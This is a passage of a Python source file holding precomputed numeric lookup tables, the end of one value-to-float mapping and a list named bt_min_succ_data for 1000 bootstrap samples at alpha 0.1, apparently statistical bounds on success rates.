0.07642131833784976, 0.329: 0.07669635669267517, 0.33: 0.07697172315780416, 0.331: 0.07724741861525855, 0.332: 0.07752344395075124, 0.333: 0.07779980005369812, 0.334: 0.07807648781727695, 0.335: 0.07835350813839569, 0.336: 0.07863086191775942, 0.337: 0.07890855005986012, 0.338: 0.07918657347301983, 0.339: 0.07946493306940684, 0.34: 0.07974362976505, 0.341: 0.08002266447986961, 0.342: 0.08030203813769611, 0.343: 0.08058175166629386, 0.344: 0.0808618059973792, 0.345: 0.08114220206666058, 0.346: 0.08142294081384127, 0.347: 0.08170402318263831, 0.348: 0.08198545012083736, 0.349: 0.08226722258028256, 0.35: 0.08254934151692636, 0.351: 0.08283180789082699, 0.352: 0.08311462266620714, 0.353: 0.08339778681143724, 0.354: 0.08368130129909428, 0.355: 0.08396516710597787, 0.356: 0.08424938521310864, 0.357: 0.08453395660580112, 0.358: 0.08481888227364158, 0.359: 0.08510416321055453, 0.36: 0.08538980041478683, 0.361: 0.08567579488898139, 0.362: 0.08596214764016047, 0.363: 0.08624885967976403, 0.364: 0.0865359320236927, 0.365: 0.08682336569231888, 0.366: 0.08711116171051607, 0.367: 0.08739932110768468, 0.368: 0.08768784491778941, 0.369: 0.08797673417936844, 0.37: 0.0882659899355753, 0.371: 0.08855561323420916, 0.372: 0.0888456051277254, 0.373: 0.08913596667328731, 0.374: 0.08942669893276224, 0.375: 0.089717802972796, 0.376: 0.09000927986480035, 0.377: 0.09030113068499687, 0.378: 0.09059335651445141, 0.379: 0.09088595843909883, 0.38: 0.09117893754977441, 0.381: 0.09147229494223763, 0.382: 0.09176603171722476, 0.383: 0.09206014898043888, 0.384: 0.09235464784261732, 0.385: 0.09264952941954734, 0.386: 0.09294479483209815, 0.387: 0.09324044520626536, 0.388: 0.09353648167316578, 0.389: 0.09383290536911687, 0.39: 0.09412971743564406, 0.391: 0.0944269190195053, 0.392: 0.09472451127274187, 0.393: 0.09502249535270467, 0.394: 0.09532087242208949, 0.395: 0.09561964364895584, 0.396: 0.09591881020677938, 0.397: 0.09621837327448969, 0.398: 0.09651833403647817, 0.399: 0.09681869368265199, 0.4: 0.09711945340848228, 0.401: 0.09742061441499439, 0.402: 0.09772217790885732, 0.403: 0.09802414510238132, 0.404: 0.0983265172135625, 0.405: 0.09862929546613368, 0.406: 0.09893248108958946, 0.407: 0.09923607531921358, 0.408: 0.09954007939613327, 0.409: 0.09984449456734855, 0.41: 0.10014932208577966, 0.411: 0.1004545632102829, 0.412: 0.10076021920570839, 0.413: 0.10106629134293674, 0.414: 0.10137278089891696, 0.415: 0.10167968915669329, 0.416: 0.10198701740546645, 0.417: 0.10229476694061598, 0.418: 0.10260293906374693, 0.419: 0.10291153508273282, 0.42: 0.10322055631175478, 0.421: 0.10353000407133751, 0.422: 0.1038398796884129, 0.423: 0.10415018449632063, 0.424: 0.1044609198348933, 0.425: 0.10477208705047297, 0.426: 0.10508368749596653, 0.427: 0.10539572253088365, 0.428: 0.10570819352137661, 0.429: 0.10602110184029956, 0.43: 0.1063344488672443, 0.431: 0.10664823598856697, 0.432: 0.10696246459746714, 0.433: 0.10727713609401288, 0.434: 0.10759225188519075, 0.435: 0.10790781338494819, 0.436: 0.10822382201425752, 0.437: 0.10854027920113521, 0.438: 0.10885718638071207, 0.439: 0.10917454499527934, 0.44: 0.10949235649431968, 0.441: 0.10981062233457517, 0.442: 0.11012934398009516, 0.443: 0.11044852290226946, 0.444: 0.11076816057990178, 0.445: 0.11108825849923756, 0.446: 0.11140881815402805, 0.447: 0.11172984104559078, 0.448: 0.11205132868283442, 0.449: 0.11237328258233543, 0.45: 0.11269570426838246, 0.451: 0.11301859527303189, 0.452: 0.11334195713615819, 0.453: 0.11366579140549511, 0.454: 0.11399009963672858, 0.455: 0.1143148833935199, 0.456: 0.11464014424756157, 0.457: 0.11496588377864335, 0.458: 0.11529210357471631, 0.459: 0.11561880523193852, 0.46: 0.11594599035472929, 0.461: 0.1162736605558398, 0.462: 0.11660181745639499, 0.463: 0.11693046268597888, 0.464: 0.11725959788265967, 0.465: 0.11758922469309523, 0.466: 0.11791934477254173, 0.467: 0.1182499597849514, 0.468: 0.11858107140302623, 0.469: 0.11891268130827812, 0.47: 0.11924479119108941, 0.471: 0.11957740275078407, 0.472: 0.119910517695687, 0.473: 0.1202441377431809, 0.474: 0.12057826461978641, 0.475: 0.12091290006121841, 0.476: 0.12124804581247554, 0.477: 0.12158370362784898, 0.478: 0.12191987527107043, 0.479: 0.12225656251530974, 0.48: 0.12259376714328658, 0.481: 0.12293149094732167, 0.482: 0.12326973572942887, 0.483: 0.12360850330134049, 0.484: 0.12394779548463959, 0.485: 0.12428761411078311, 0.486: 0.124627961021199, 0.487: 0.12496883806734783, 0.488: 0.12531024711081143, 0.489: 0.1256521900233532, 0.49: 0.12599466868701625, 0.491: 0.1263376849941603, 0.492: 0.12668124084758633, 0.493: 0.12702533816057304, 0.494: 0.12736997885698464, 0.495: 0.1277151648713401, 0.496: 0.12806089814888133, 0.497: 0.1284071806456874, 0.498: 0.12875401432871114, 0.499: 0.12910140117589755, 0.5: 0.1294493431762619, 0.501: 0.12979784232994518, 0.502: 0.1301469006483328, 0.503: 0.13049652015414506, 0.504: 0.13084670288147476, 0.505: 0.13119745087593734, 0.506: 0.13154876619470057, 0.507: 0.13190065090662206, 0.508: 0.13225310709230625, 0.509: 0.13260613684422873, 0.51: 0.13295974226678015, 0.511: 0.1333139254764025, 0.512: 0.1336686886016622, 0.513: 0.13402403378335564, 0.514: 0.13437996317458453, 0.515: 0.13473647894087462, 0.516: 0.13509358326026316, 0.517: 0.13545127832339895, 0.518: 0.13580956633363708, 0.519: 0.13616844950714427, 0.52: 0.136527930072998, 0.521: 0.13688801027328987, 0.522: 0.13724869236323353, 0.523: 0.13760997861126137, 0.524: 0.1379718712991265, 0.525: 0.13833437272202093, 0.526: 0.1386974851886771, 0.527: 0.1390612110214796, 0.528: 0.13942555255657146, 0.529: 0.13979051214395583, 0.53: 0.14015609214763355, 0.531: 0.14052229494569438, 0.532: 0.14088912293043793, 0.533: 0.14125657850848247, 0.534: 0.1416246641008996, 0.535: 0.14199338214330975, 0.536: 0.1423627350860244, 0.537: 0.14273272539413945, 0.538: 0.14310335554768486, 0.539: 0.14347462804172595, 0.54: 0.1438465453864995, 0.541: 0.1442191101075287, 0.542: 0.14459232474577235, 0.543: 0.1449661918577153, 0.544: 0.14534071401553914, 0.545: 0.1457158938072179, 0.546: 0.14609173383668234, 0.547: 0.14646823672391804, 0.548: 0.14684540510512592, 0.549: 0.14722324163286887, 0.55: 0.14760174897616385, 0.551: 0.14798092982066696, 0.552: 0.14836078686879586, 0.553: 0.1487413228398762, 0.554: 0.14912254047027446, 0.555: 0.14950444251355421, 0.556: 0.14988703174062287, 0.557: 0.15027031093987303, 0.558: 0.15065428291734878, 0.559: 0.15103895049687566, 0.56: 0.15142431652022192, 0.561: 0.15181038384726742, 0.562: 0.1521971553561463, 0.563: 0.15258463394339888, 0.564: 0.15297282252415018, 0.565: 0.1533617240322658, 0.566: 0.15375134142050884, 0.567: 0.15414167766070536, 0.568: 0.15453273574392945, 0.569: 0.1549245186806466, 0.57: 0.15531702950090986, 0.571: 0.1557102712545081, 0.572: 0.1561042470111676, 0.573: 0.15649895986070417, 0.574: 0.15689441291321915, 0.575: 0.15729060929927896, 0.576: 0.1576875521700936, 0.577: 0.1580852446976913, 0.578: 0.1584836900751271, 0.579: 0.15888289151666476, 0.58: 0.15928285225796399, 0.581: 0.1596835755562652, 0.582: 0.16008506469061237, 0.583: 0.16048732296202217, 0.584: 0.16089035369370905, 0.585: 0.16129416023126705, 0.586: 0.16169874594289305, 0.587: 0.16210411421957827, 0.588: 0.16251026847533698, 0.589: 0.16291721214739183, 0.59: 0.16332494869642622, 0.591: 0.16373348160675336, 0.592: 0.1641428143865904, 0.593: 0.1645529505682422, 0.594: 0.16496389370832842, 0.595: 0.16537564738804714, 0.596: 0.16578821521334683, 0.597: 0.16620160081521945, 0.598: 0.16661580784990357, 0.599: 0.16703083999912705, 0.6: 0.1674467009703354, 0.601: 0.16786339449698484, 0.602: 0.16828092433873468, 0.603: 0.16869929428172162, 0.604: 0.169118508138823, 0.605: 0.1695385697498988, 0.606: 0.16995948298204558, 0.607: 0.17038125172989044, 0.608: 0.17080387991581378, 0.609: 0.17122737149026232, 0.61: 0.17165173043198836, 0.611: 0.1720769607483454, 0.612: 0.17250306647555386, 0.613: 0.1729300516790017, 0.614: 0.17335792045351325, 0.615: 0.1737866769236534, 0.616: 0.17421632524401046, 0.617: 0.1746468695994971, 0.618: 0.17507831420565434, 0.619: 0.17551066330896237, 0.62: 0.17594392118712604, 0.621: 0.17637809214942018, 0.622: 0.1768131805369832, 0.623: 0.17724919072313622, 0.624: 0.17768612711373116, 0.625: 0.17812399414744517, 0.626: 0.1785627962961532, 0.627: 0.17900253806524002, 0.628: 0.17944322399393162, 0.629: 0.17988485865567744, 0.63: 0.180327446658469, 0.631: 0.18077099264520646, 0.632: 0.1812155012940707, 0.633: 0.18166097731887176, 0.634: 0.1821074254694106, 0.635: 0.18255485053187898, 0.636: 0.18300325732921507, 0.637: 0.18345265072150788, 0.638: 0.18390303560636884, 0.639: 0.18435441691933233, 0.64: 0.18480679963426472, 0.641: 0.18526018876376166, 0.642: 0.1857145893595442, 0.643: 0.18617000651289878, 0.644: 0.18662644535509104, 0.645: 0.1870839110577722, 0.646: 0.18754240883345613, 0.647: 0.18800194393592007, 0.648: 0.18846252166064992, 0.649: 0.18892414734532698, 0.65: 0.18938682637023913, 0.651: 0.18985056415878246, 0.652: 0.19031536617790407, 0.653: 0.19078123793859408, 0.654: 0.19124818499635504, 0.655: 0.19171621295171193, 0.656: 0.19218532745069095, 0.657: 0.1926555341853225, 0.658: 0.19312683889416116, 0.659: 0.19359924736280187, 0.66: 0.19407276542439827, 0.661: 0.19454739896019313, 0.662: 0.1950231539000885, 0.663: 0.1955000362231294, 0.664: 0.19597805195812434, 0.665: 0.19645720718417137, 0.666: 0.1969375080312527, 0.667: 0.19741896068079068, 0.668: 0.1979015713662402, 0.669: 0.19838534637370456, 0.67: 0.1988702920425144, 0.671: 0.19935641476587196, 0.672: 0.19984372099143724, 0.673: 0.20033221722198943, 0.674: 0.20082191001605193, 0.675: 0.20131280598855258, 0.676: 0.20180491181148238, 0.677: 0.20229823421455562, 0.678: 0.202792779985896, 0.679: 0.20328855597273982, 0.68: 0.20378556908210874, 0.681: 0.20428382628155384, 0.682: 0.20478333459984766, 0.683: 0.20528410112773196, 0.684: 0.20578613301867388, 0.685: 0.2062894374895787, 0.686: 0.20679402182159856, 0.687: 0.20729989336089943, 0.688: 0.20780705951945155, 0.689: 0.20831552777581072, 0.69: 0.20882530567596289, 0.691: 0.2093364008341447, 0.692: 0.20984882093367282, 0.693: 0.21036257372779668, 0.694: 0.2108776670405803, 0.695: 0.21139410876777068, 0.696: 0.2119119068777031, 0.697: 0.21243106941219608, 0.698: 0.21295160448747266, 0.699: 0.21347352029512576, 0.7: 0.21399682510303225, 0.701: 0.21452152725634926, 0.702: 0.21504763517848402, 0.703: 0.21557515737209668, 0.704: 0.21610410242011052, 0.705: 0.2166344789867689, 0.706: 0.2171662958186337, 0.707: 0.21769956174571664, 0.708: 0.21823428568248668, 0.709: 0.21877047662904875, 0.71: 0.2193081436722041, 0.711: 0.2198472959866113, 0.712: 0.2203879428359658, 0.713: 0.22093009357411275, 0.714: 0.22147375764632216, 0.715: 0.22201894459043073, 0.716: 0.22256566403813283, 0.717: 0.22311392571621594, 0.718: 0.22366373944783802, 0.719: 0.22421511515382514, 0.72: 0.2247680628540138, 0.721: 0.22532259266856458, 0.722: 0.22587871481936841, 0.723: 0.22643643963140753, 0.724: 0.22699577753418013, 0.725: 0.2275567390631562, 0.726: 0.22811933486122538, 0.727: 0.2286835756801963, 0.728: 0.2292494723823189, 0.729: 0.22981703594182484, 0.73: 0.23038627744649448, 0.731: 0.23095720809927242, 0.732: 0.23152983921988868, 0.733: 0.2321041822464993, 0.734: 0.23268024873742021, 0.735: 0.23325805037279204, 0.736: 0.23383759895636017, 0.737: 0.23441890641727506, 0.738: 0.23500198481185625, 0.739: 0.23558684632547633, 0.74: 0.23617350327442724, 0.741: 0.23676196810786698, 0.742: 0.23735225340971805, 0.743: 0.23794437190069778, 0.744: 0.23853833644033903, 0.745: 0.2391341600290356, 0.746: 0.23973185581016365, 0.747: 0.2403314370722066, 0.748: 0.24093291725095917, 0.749: 0.2415363099317333, 0.75: 0.24214162885164442, 0.751: 0.24274888790188998, 0.752: 0.24335810113014295, 0.753: 0.2439692827429402, 0.754: 0.244582447108108, 0.755: 0.24519760875728072, 0.756: 0.24581478238846102, 0.757: 0.24643398286857535, 0.758: 0.24705522523614448, 0.759: 0.247678524703978, 0.76: 0.2483038966619244, 0.761: 0.2489313566797009, 0.762: 0.24956092050970227, 0.763: 0.2501926040899815, 0.764: 0.25082642354721935, 0.765: 0.251462395199727, 0.766: 0.25210053556061046, 0.767: 0.25274086134088347, 0.768: 0.2533833894527322, 0.769: 0.25402813701282223, 0.77: 0.25467512134563586, 0.771: 0.25532435998694697, 0.772: 0.255975870687307, 0.773: 0.25662967141564796, 0.774: 0.25728578036293126, 0.775: 0.257944215945903, 0.776: 0.25860499681089555, 0.777: 0.25926814183775904, 0.778: 0.2599336701437952, 0.779: 0.2606016010878805, 0.78: 0.26127195427462435, 0.781: 0.26194474955857344, 0.782: 0.2626200070486076, 0.783: 0.26329774711236986, 0.784: 0.26397799038077596, 0.785: 0.2646607577527068, 0.786: 0.2653460703996925, 0.787: 0.26603394977082295, 0.788: 0.26672441759766086, 0.789: 0.26741749589934827, 0.79: 0.26811320698777924, 0.791: 0.2688115734729059, 0.792: 0.2695126182681659, 0.793: 0.27021636459605924, 0.794: 0.270922835993805, 0.795: 0.2716320563191784, 0.796: 0.2723440497564509, 0.797: 0.2730588408225018, 0.798: 0.27377645437302944, 0.799: 0.27449691560896095, 0.8: 0.27522025008299583, 0.801: 0.27594648370626207, 0.802: 0.2766756427552376, 0.803: 0.27740775387872363, 0.804: 0.2781428441050571, 0.805: 0.2788809408495003, 0.806: 0.27962207192177896, 0.807: 0.2803662655338274, 0.808: 0.2811135503077288, 0.809: 0.2818639552838439, 0.81: 0.2826175099291502, 0.811: 0.28337424414582163, 0.812: 0.28413418827992953, 0.813: 0.28489737313051333, 0.814: 0.2856638299587509, 0.815: 0.28643359049743594, 0.816: 0.2872066869607032, 0.817: 0.28798315205396063, 0.818: 0.2887630189841298, 0.819: 0.28954632147014897, 0.82: 0.2903330937537252, 0.821: 0.2911233706104174, 0.822: 0.2919171873609755, 0.823: 0.2927145798830292, 0.824: 0.2935155846230349, 0.825: 0.2943202386086293, 0.826: 0.2951285794612334, 0.827: 0.2959406454090917, 0.828: 0.296756475300599, 0.829: 0.29757610861805905, 0.83: 0.29839958549179174, 0.831: 0.29922694671465455, 0.832: 0.30005823375696744, 0.833: 0.3008934887818879, 0.834: 0.3017327546612134, 0.835: 0.30257607499161887, 0.836: 0.30342349411142644, 0.837: 0.304275057117819, 0.838: 0.3051308098845464, 0.839: 0.30599079908023513, 0.84: 0.3068550721871839, 0.841: 0.3077236775206872, 0.842: 0.3085966642490721, 0.843: 0.3094740824141966, 0.844: 0.3103559829527036, 0.845: 0.3112424177178285, 0.846: 0.3121334395019754, 0.847: 0.3130291020598767, 0.848: 0.31392946013267803, 0.849: 0.3148345694725149, 0.85: 0.31574448686815393, 0.851: 0.31665927017126166, 0.852: 0.3175789783235609, 0.853: 0.31850367138497404, 0.854: 0.31943341056253666, 0.855: 0.32036825824038817, 0.856: 0.3213082780106422, 0.857: 0.3222535347054343, 0.858: 0.32320409442988757, 0.859: 0.3241600245963502, 0.86: 0.32512139395965584, 0.861: 0.3260882726537293, 0.862: 0.3270607322293416, 0.863: 0.3280388456932857, 0.864: 0.32902268754886954, 0.865: 0.33001233383784195, 0.866: 0.33100786218383216, 0.867: 0.3320093518373427, 0.868: 0.33301688372237925, 0.869: 0.3340305404847731, 0.87: 0.3350504065422603, 0.871: 0.33607656813651987, 0.872: 0.33710911338693283, 0.873: 0.3381481323466401, 0.874: 0.33919371706047996, 0.875: 0.3402459616253203, 0.876: 0.3413049622526002, 0.877: 0.34237081733338237, 0.878: 0.34344362750587093, 0.879: 0.344523495725656, 0.88: 0.3456105273387513, 0.881: 0.34670483015749626, 0.882: 0.3478065145396591, 0.883: 0.3489156934706179, 0.884: 0.3500324826490219, 0.885: 0.3511570005760081, 0.886: 0.35228936864811067, 0.887: 0.35342971125409106, 0.888: 0.35457815587599106, 0.889: 0.35573483319437665, 0.89: 0.35689987719830346, 0.891: 0.3580734253000495, 0.892: 0.3592556184548126, 0.893: 0.36044660128589723, 0.894: 0.3616465222155064, 0.895: 0.36285553360138006, 0.896: 0.3640737918798012, 0.897: 0.3653014577152351, 0.898: 0.3665386961568701, 0.899: 0.36778567680270435, 0.9: 0.3690425739712867, 0.901: 0.37030956688192357, 0.902: 0.3715868398434812, 0.903: 0.37287458245257316, 0.904: 0.3741729898016013, 0.905: 0.37548226269719714, 0.906: 0.3768026078897954, 0.907: 0.378134238314937, 0.908: 0.37947737334708087, 0.909: 0.38083223906674324, 0.91: 0.38219906854181984, 0.911: 0.3835781021239361, 0.912: 0.38496958776079576, 0.913: 0.38637378132577954, 0.914: 0.3877909469657132, 0.915: 0.38922135746822073, 0.916: 0.39066529464976885, 0.917: 0.3921230497662107, 0.918: 0.3935949239469887, 0.919: 0.3950812286550077, 0.92: 0.39658228617383234, 0.921: 0.3980984301243421, 0.922: 0.39963000601279863, 0.923: 0.4011773718129906, 0.924: 0.4027408985847371, 0.925: 0.4043209711317251, 0.926: 0.40591798870156176, 0.927: 0.4075323657317996, 0.928: 0.4091645326448546, 0.929: 0.41081493669652935, 0.93: 0.41248404288216023, 0.931: 0.41417233490523914, 0.932: 0.41588031621383637, 0.933: 0.41760851111052566, 0.934: 0.4193574659425829, 0.935: 0.4211277503789231, 0.936: 0.42291995878221855, 0.937: 0.42473471168447596, 0.938: 0.42657265737574357, 0.939: 0.4284344736166483, 0.94: 0.43032086948677106, 0.941: 0.432232587381485, 0.942: 0.43417040517298744, 0.943: 0.4361351385507812, 0.944: 0.4381276435612516, 0.945: 0.44014881936622124, 0.946: 0.44219961124405294, 0.947: 0.44428101385974056, 0.948: 0.4463940748332428, 0.949: 0.44853989864010696, 0.95: 0.4507196508818678, 0.951: 0.4529345629700977, 0.952: 0.45518593727289863, 0.953: 0.45747515278081924, 0.954: 0.45980367135633604, 0.955: 0.46217304464121944, 0.956: 0.4645849217079045, 0.957: 0.4670410575530351, 0.958: 0.46954332254848785, 0.959: 0.4720937129834131, 0.96: 0.47469436285272015, 0.961: 0.47734755707524595, 0.962: 0.4800557463561398, 0.963: 0.4828215639469468, 0.964: 0.4856478446055499, 0.965: 0.4885376461125343, 0.966: 0.4914942737745481, 0.967: 0.49452130842950337, 0.968: 0.4976226385777961, 0.969: 0.5008024973958326, 0.97: 0.5040655055604257, 0.971: 0.5074167210204681, 0.972: 0.5108616971284513, 0.973: 0.5144065508883955, 0.974: 0.5180580435286398, 0.975: 0.5218236761943078, 0.976: 0.5257118043278883, 0.977: 0.5297317753353202, 0.978: 0.5338940955221816, 0.979: 0.5382106341669483, 0.98: 0.5426948752053159, 0.981: 0.5473622306342155, 0.982: 0.5522304349152825, 0.983: 0.5573200471216728, 0.984: 0.5626550985532288, 0.985: 0.5682639400343021, 0.986: 0.574180368432149, 0.987: 0.5804451518443972, 0.988: 0.5871081376193765, 0.989: 0.5942312358276155, 0.99: 0.6018927595381185, 0.991: 0.6101939464147714, 0.992: 0.6192691432165274, 0.993: 0.6293024734013033, 0.994: 0.6405567501490285, 0.995: 0.653427511088023, 0.996: 0.6685545316863031, 0.997: 0.687086469892058, 0.998: 0.7114599543785525, 0.999: 0.7488112942693539}} # noqa: E501, E231 bt_min_succ_data = {'num_bt = 1000, alpha = 0.1': [0.00010537719726562501, 0.00053192138671875, 0.0011025695800781247, 0.001745849609375, 0.002434478759765625, 0.0031548461914062496, 0.0038988952636718746, 0.004661621093749999, 0.0054394836425781246, 0.00622998046875, 0.007031219482421876, 0.007841796875000001, 0.008660491943359376, 0.009486450195312503, 0.010318756103515628, 0.011156921386718754, 0.01200039672851563, 0.012848632812500007, 0.013701263427734384, 0.014557983398437509, 0.015418487548828134, 0.01628247070312501, 0.017149749755859388, 0.018020080566406263, 0.01889334106445314, 0.019769226074218764, 0.02064773559570314, 0.021528625488281265, 0.022411773681640636, 0.02329711914062501, 0.024184600830078132, 0.025073974609375008, 0.025965240478515637, 0.026858337402343765, 0.027753143310546888, 0.028649597167968763, 0.029547637939453135, 0.030447204589843763, 0.031348175048828135, 0.03225061035156251, 0.03315444946289064, 0.03405950927734376, 0.03496591186523438, 0.035873535156250004, 0.03678231811523438, 0.037692199707031256, 0.03860324096679688, 0.03951538085937501, 0.04042855834960939, 0.041342712402343766, 0.04225790405273439, 0.043174011230468774, 0.04409109497070315, 0.04500903320312503, 0.04592788696289065, 0.046847595214843774, 0.04776815795898439, 0.04868951416015627, 0.0496116638183594, 0.050534606933593774, 0.05145828247070316, 0.05238275146484379, 0.05330795288085941, 0.054233825683593785, 0.05516036987304691, 0.05608764648437504, 0.05701559448242192, 0.0579441528320313, 0.058873382568359424, 0.05980322265625005, 0.060733673095703176, 0.0616647338867188, 0.06259634399414066, 0.06352856445312505, 0.06446139526367192, 0.06539471435546879, 0.06632864379882816, 0.06726306152343753, 0.06819802856445314, 0.06913348388671878, 0.07006948852539066, 0.07100598144531253, 0.07194296264648442, 0.07288037109375006, 0.07381832885742196, 0.07475677490234384, 0.07569564819335947, 0.07663494873046883, 0.07757473754882821, 0.07851495361328134, 0.0794555969238282, 0.08039666748046884, 0.0813381652832032, 0.08228002929687508, 0.08322238159179696, 0.08416510009765632, 0.08510824584960947, 0.0860517578125001, 0.08699563598632823, 0.08793994140625011, 0.08888455200195325, 0.08982958984375011, 0.0907749938964845, 0.09172076416015637, 0.0926668395996095, 0.09361334228515636, 0.09456015014648447, 0.0955073242187501, 0.09645480346679697, 0.09740264892578135, 0.09835079956054699, 0.09929931640625012, 0.10024807739257824, 0.10119726562500012, 0.10214669799804699, 0.10309643554687511, 0.10404653930664076, 0.10499694824218764, 0.10594760131835951, 0.10689855957031263, 0.10784988403320328, 0.10880145263671892, 0.10975332641601579, 0.11070544433593765, 0.11165786743164077, 0.11261059570312515, 0.11356356811523452, 0.11451684570312515, 0.11547036743164077, 0.11642419433593765, 0.11737826538085952, 0.11833258056640639, 0.11928720092773451, 0.12024206542968766, 0.1211971740722658, 0.12215252685546893, 0.12310818481445332, 0.12406402587890647, 0.12502017211914085, 0.12597650146484402, 0.12693313598632844, 0.1278899536132816, 0.128847076416016, 0.12980438232421915, 0.13076193237304728, 0.13171972656250042, 0.13267776489257854, 0.13363598632812546, 0.13459445190429736, 0.13555316162109426, 0.13651211547851616, 0.1374712524414068, 0.1384306335449224, 0.13939019775390682, 0.14035000610351622, 0.14130999755859436, 0.1422702331542975, 0.14323065185546935, 0.1441913146972662, 0.14515216064453185, 0.14611318969726622, 0.14707446289062565, 0.1480359191894538, 0.14899761962890695, 0.14995944213867257, 0.15092150878906319, 0.1518837585449226, 0.15284625244140698, 0.15380886840820385, 0.1547717285156257, 0.1557347717285163, 0.15669799804687568, 0.15766140747070378, 0.15862500000000063, 0.15958877563476626, 0.16055273437500062, 0.16151693725586003, 0.1624812622070319, 0.16344577026367252, 0.16441046142578192, 0.16537533569336005, 0.1663403930664069, 0.1673056335449225, 0.1682710571289069, 0.16923660278320374, 0.17020239257812564, 0.17116830444336, 0.17213439941406317, 0.17310067749023506, 0.17406707763671947, 0.17503372192382888, 0.17600048828125076, 0.17696737670898516, 0.17793450927734455, 0.17890176391601642, 0.17986920166015702, 0.18083676147461014, 0.18180456542968826, 0.18277243041992264, 0.18374053955078207, 0.18470877075195397, 0.1856771240234384, 0.18664566040039154, 0.18761437988281343, 0.18858322143554784, 0.189552246093751, 0.1905213928222666, 0.191490722656251, 0.19246017456054787, 0.19342980957031353, 0.19439956665039165, 0.19536950683593857, 0.196339569091798, 0.1973097534179699, 0.19828012084961055, 0.19925061035156372, 0.2002212829589856, 0.20119207763672003, 0.20216299438476693, 0.20313409423828255, 0.2041053161621107, 0.20507672119140757, 0.20604818725586072, 0.2070198364257826, 0.2079916687011732, 0.20896356201172006, 0.20993563842773566, 0.21090783691406378, 0.21188021850586064, 0.21285266113281376, 0.21382528686523566, 0.21479803466797004, 0.21577090454101694, 0.21674395751953257, 0.21771707153320446, 0.2186903686523451, 0.21966378784179824, 0.22063732910156386, 0.221610992431642, 0.22258483886718888, 0.22355874633789202, 0.2245328369140639, 0.2255070495605483, 0.22648138427734515, 0.22745584106445454, 0.2284304199218764, 0.2294051208496108, 0.23037994384765764, 0.23135494995117323, 0.23233001708984508, 0.23330520629882945, 0.23428057861328255, 0.23525601196289192, 0.23623162841797002, 0.23720730590820438, 0.23818316650390753, 0.23915908813476694, 0.24013519287109508, 0.2411113586425795, 0.24208764648437636, 0.24306411743164197, 0.24404064941406384, 0.24501730346679823, 0.24599414062500136, 0.24697103881836074, 0.2479480590820326, 0.24892520141601698, 0.24990246582031383, 0.25087985229492316, 0.251857360839845, 0.2528349304199231, 0.25381268310547, 0.25479049682617305, 0.2557684936523449, 0.256746551513673, 0.2577247314453136, 0.25870303344726675, 0.2596814575195324, 0.26065994262695436, 0.26163861083984497, 0.26261734008789184, 0.26359619140625123, 0.26457516479492316, 0.2655542602539076, 0.2665334167480483, 0.2675127563476577, 0.26849215698242335, 0.2694716796875015, 0.2704513244628922, 0.2714310302734392, 0.2724109191894548, 0.2733908691406267, 0.27437094116211114, 0.2753510742187518, 0.2763313293457049, 0.2773117675781268, 0.2782922058105487, 0.2792728271484394, 0.2802535095214863, 0.28123431396484566, 0.28221524047851754, 0.28319628906250194, 0.2841773986816426, 0.2851586303710957, 0.286139923095705, 0.28712139892578314, 0.28810293579101753, 0.28908459472656445, 0.2900663146972675, 0.2910481567382831, 0.2920301208496112, 0.2930121459960956, 0.2939942932128925, 0.2949765625000019, 0.2959589538574239, 0.296941406250002, 0.29792391967773635, 0.2989066162109395, 0.2998893737792989, 0.3008721923828146, 0.30185519409179906, 0.3028382568359398, 0.3038213806152368, 0.3048046264648462, 0.3057879943847681, 0.30677148437500257, 0.3077550354003933, 0.30873864746094026, 0.3097224426269559, 0.3107062377929716, 0.311690216064456, 0.3126742553710967, 0.3136583557128937, 0.31464263916015933, 0.315626922607425, 0.3166113891601594, 0.3175959167480501, 0.31858050537109706, 0.3195652160644564, 0.3205500488281283, 0.3215349426269565, 0.32251995849609716, 0.3235050354003941, 0.32449023437500346, 0.3254754943847691, 0.3264608764648472, 0.3274463806152379, 0.32843194580078483, 0.3294175720214879, 0.3304033813476598, 0.33138919067383166, 0.33237512207031605, 0.333361175537113, 0.33434729003906616, 0.33533352661133187, 0.33631982421875384, 0.3373062438964882, 0.33829272460937887, 0.33927932739258204, 0.3402659912109415, 0.34125277709961344, 0.34223962402344166, 0.3432265930175824, 0.3442136230468794, 0.34520077514648884, 0.3461879882812545, 0.34717532348633273, 0.3481627197265672, 0.34915017700195794, 0.35013781738281735, 0.35112545776367676, 0.3521132202148487, 0.35310110473633316, 0.3540890502929739, 0.35507705688477087, 0.35606518554688027, 0.3570534362793022, 0.3580417480468804, 0.35903012084961483, 0.3600186157226618, 0.36100717163086493, 0.3619957885742243, 0.3629845886230525, 0.36397338867188067, 0.36496231079102137, 0.3659513549804745, 0.3669403991699276, 0.3679296264648495, 0.3689188537597714, 0.3699082641601621, 0.3708976745605528, 0.3718872070312559, 0.3728768615722715, 0.3738665771484434, 0.37485635375977155, 0.37584625244141223, 0.37683621215820917, 0.37782623291016226, 0.3788163757324279, 0.379806640625006, 0.38079690551758416, 0.3817873535156311, 0.382777801513678, 0.38376837158203736, 0.3847590637207092, 0.3857497558593811, 0.38674063110352175, 0.3877315063476624, 0.38872250366211547, 0.38971362304688106, 0.39070474243164666, 0.39169604492188104, 0.3926873474121154, 0.3936787719726623, 0.39467031860352164, 0.39566186523438096, 0.3966535339355528, 0.3976453247070372, 0.3986371765136778, 0.3996290893554747, 0.4006211242675841, 0.4016132202148498, 0.40260537719727174, 0.4035976562500061, 0.4045899963378967, 0.40558245849609986, 0.40657498168945927, 0.40756756591797494, 0.40856027221680313, 0.4095530395507876, 0.4105458679199283, 0.41153881835938144, 0.41253182983399084, 0.4135249023437565, 0.4145180969238347, 0.4155113525390691, 0.4165047302246161, 0.4174981689453192, 0.4184916687011786, 0.4194852905273505, 0.4204789733886787, 0.4214727172851631, 0.42246658325196007, 0.4234605102539132, 0.42445449829102255, 0.42544860839844445, 0.4264427795410226, 0.42743701171875703, 0.428431365966804, 0.4294257812500071, 0.4304203186035227, 0.4314149169921946, 0.43240957641602273, 0.43340429687500714, 0.4343991394043041, 0.43539404296875717, 0.4363890686035228, 0.43738415527344465, 0.4383793029785228, 0.43937457275391345, 0.4403698425293041, 0.44136529541016345, 0.4423607482910228, 0.44335632324219465, 0.4443519592285228, 0.4453477172851634, 0.44634353637696034, 0.4473394165039134, 0.448335418701179, 0.44933148193360084, 0.45032760620117895, 0.4513238525390696, 0.4523201599121165, 0.45331652832031955, 0.45431295776367886, 0.4553095092773507, 0.45630618286133506, 0.45730285644531943, 0.4582996520996163, 0.45929650878906936, 0.4602934875488349, 0.46129052734375675, 0.46228762817383484, 0.46328485107422546, 0.46428213500977233, 0.46527947998047536, 0.46627688598633465, 0.46727441406250647, 0.46827200317383455, 0.46926971435547515, 0.470267486572272, 0.47126531982422515, 